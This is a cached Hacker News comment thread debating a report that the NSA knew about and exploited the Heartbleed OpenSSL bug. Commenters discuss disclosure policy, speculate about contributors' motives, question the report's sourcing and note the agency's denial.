malandrew 2 days ago 0 replies      
A reasonable policy upon discovering this type of bug is to allow the agency a fix period of time to exploit the bug and then require that they provide support in fixing the bugs for as many major US companies and institutions as possible as quickly as possible.

If they are given carte blanche to use the exploit indefinitely, they will keep it forever and let the world discover and exploit it as well. If they have a finite time period like 1-3 months, they will prioritize exploiting those systems that are actually valuable for national security. While they are doing so, they should keep an auditable log of all the systems they use the exploit against so that oversight may be performed in hindsight. Furthermore, they should absolutely be barred from using any exploit against a target with a US-based IP, or possibly even any IP address in allied nations.

It is far less likely that the agency will have the opportunity to abuse exploits if they are forced to prioritize targets due to a fixed deadline on disclosure.

During the deadline period, they should also be working on a plan that minimizes the amount of damages once disclosure is forced. i.e. there should be a list of people and companies that get the information first and everyone on the list should be people in charge of protecting computer systems (i.e. no one involved in offensive activities is on the list). Companies like Google, Facebook, Akamai, Apple and the package maintainers for all the major *nix distros should be on that shortlist of those that get priority notification.

protomyth 2 days ago 2 replies      
I'm wondering if any State Attorney Generals are tech savvy, don't like the current administration, and want some publicity[1] enough to start an investigation? I would imagine a subpoena asking for the financial records of the OpenSSL contributors would be a first step (to find Gov payments). I can see a very scary witch hunt.

1) that part might be a little rhetorical, every AG likes good publicity.

zacinbusiness 2 days ago 0 replies      
While there's no evidence (yet) that the NSA knew about or exploited this bug, I would not be the least bit surprised if they did. Honestly, my first thought when reading about Heartbleed was "I wonder how much the NSA paid the contributor. Or did they just threaten his family?" It seems there have been a lot of "oops" errors being found in critical security systems these days, and every single one of them is directly beneficial to the NSA and its mission to "h4ck the plan37!"
lauradhamilton 2 days ago 1 reply      
It certainly seems believable, but do we have anything more concrete to go on than "two people familiar with the matter?" Is that even two people with top-secret clearance at the NSA?
stcredzero 2 days ago 1 reply      
Your friends tell you about your flaws and shortcomings. The people who keep quiet or even exploit your flaws? They are not your friends.

So, what's to keep some organization that runs a package repo from publishing OpenSSL packages that claim to be like OpenSSL 1.0.1g but actually display the heartbleed bug? I also ask myself, would the NSA seek to implement such a thing? They would, though that is an entirely different question from if they have.

otterley 2 days ago 0 replies      
I've never understood theories about NSA capability. Everyone complains that Government officials are barely competent, if at all, yet when it comes to NSA, those same people think NSA staff is at least ten times as brilliant as the general population.

Everything I've seen NSA do is largely based on the same techniques Google uses, except 10 years later, much more expensively, and with much uglier PowerPoint presentations. The only thing NSA has that private organizations don't is the compelled cooperation of telecom companies.

schrodingersCat 2 days ago 0 replies      
I hesitate to believe that in 2 years time, the agency hasn't found another backdoor to the web. OpenSSL might be patched, but what else is still vulnerable?
dsugarman 2 days ago 0 replies      
What upsets me the most is that they new this existed, and that a lot of the US economy relies on our tech companies, and they did nothing to inform the companies about the security flaw.
devindotcom 2 days ago 0 replies      
FWIW, we asked the NSA and NSC; both deny:


anonbanker 2 days ago 2 replies      
Now would be the time to start looking up the backgrounds of the people who implemented heartbeat support. For instance, the same guy responsible for the Heartbeat spec was the author of the OpenSSL implementation.

While we do not want to make this into a witch hunt, now that the NSA is involved in Heartbleed, we should definitely rule out malice by checking for direct ties between contributors of known flawed/malicious code related to the implementation of Heartbeat.

smegel 2 days ago 1 reply      
> highlights one of the failings of open source software development.

Sorry? Paid programmers writing closed code with probably less review and auditing have been shown to create less bugs? What are they trying to say?

tzs 2 days ago 0 replies      
> The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug [...]

Interesting that they say "at least" two years. The bug is two years old, so they could have also chosen to say "at most" two years or "up to" two years. Least biased would be to just say "since the bug was introduced, two years ago".

leeoniya 2 days ago 0 replies      
s/Flawed Protocol/Flawed Implementation/
forgotAgain 2 days ago 0 replies      
Sounds plausible to me. I would think the NSA, and other spy agencies, pour over every release of a security package to see if any exploitable errors were made.
err4nt 2 days ago 3 replies      
Do we have anything that leads us to believe the NSA was aware of heartbleed at all before we found out, other than speculation because of their resources?
dombili 2 days ago 6 replies      
My first thought: if this is the case, then why did they try so hard (and get "trolled" in the progress) to get the SSL keys from Lavabit?
abdullahkhalids 2 days ago 0 replies      
You can assume that any bug in open source software that could have been found using systematic and automated analysis has already been found by the NSA.
higherpurpose 2 days ago 0 replies      
Well this was flagged fast.
muyuu 2 days ago 1 reply      
This is flamebait. Sad it's getting so many upvotes.
       cached 14 April 2014 04:11:01 GMT